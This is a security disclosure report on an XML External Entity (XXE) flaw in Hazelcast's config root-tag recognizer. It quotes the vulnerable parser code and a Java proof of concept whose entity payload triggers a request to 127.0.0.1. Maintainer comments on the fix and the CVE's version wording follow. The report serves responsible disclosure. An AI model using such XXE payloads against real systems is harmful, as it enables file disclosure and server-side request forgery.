Improper Restriction of XML External Entity Reference in hazelcast/hazelcast
Reported on
Jan 16th 2022
Description
The AbstractXmlConfigRootTagRecognizer() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/hazelcast/hazelcast/blob/f373d8e05f0258a8e5e817a46b16ed4e32278bd3/hazelcast/src/main/java/com/hazelcast/internal/config/AbstractXmlConfigRootTagRecognizer.java#L56-L65
public AbstractXmlConfigRootTagRecognizer(String expectedRootNode) throws Exception {
this.expectedRootNode = expectedRootNode;
SAXParserFactory factory = SAXParserFactory.newInstance();
saxParser = factory.newSAXParser();
}
@Override
public boolean isRecognized(ConfigStream configStream) throws Exception {
MemberHandler memberHandler = new MemberHandler(expectedRootNode);
try {
saxParser.parse(configStream, memberHandler);
}
Proof of Concept
Extracted out the key function mentioned above to showcase how it can be exploited.
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;
import java.io.ByteArrayInputStream;
public class Poc {
public static void main(String[] args) {
try {
String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
} catch (Exception e) {
e.printStackTrace();
}
}
}
Causes an SSRF to http://127.0.0.1
Impact
This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.
Occurrences
SECURITY.md
2 years ago
The fix is on the way: https://github.com/hazelcast/hazelcast/pull/20407
Even the class is not new, the only affected version seems to be the enterprise version of the latest beta (5.1-BETA-1). I didn't find a valid call path (other than ones from tests) in previous releases.
With this PR merged, has this been fixed? If so, we can go ahead and confirm the fix against the report ♥️
The PR is merged and the fix will be included in Hazelcast 5.1. I would like to publish the report after the new version is released. The plan is to have the new version out in February.
Okay, thanks for the update Josef and that makes sense.
We will confirm the fix for this report once you are ready to publish the report!
@jamieslome, how we can change the description of the CVE to explicitly state the vulnerable version (5.1-BETA-1)? It currently says "repository hazelcast/hazelcast prior to 5.1."
@kwart - I have updated the CVE for you 👍
https://github.com/CVEProject/cvelist/pull/5209/files
The description will now reflect the vulnerable version instead of 5.1. Please allow 1 hour for the CVE to update.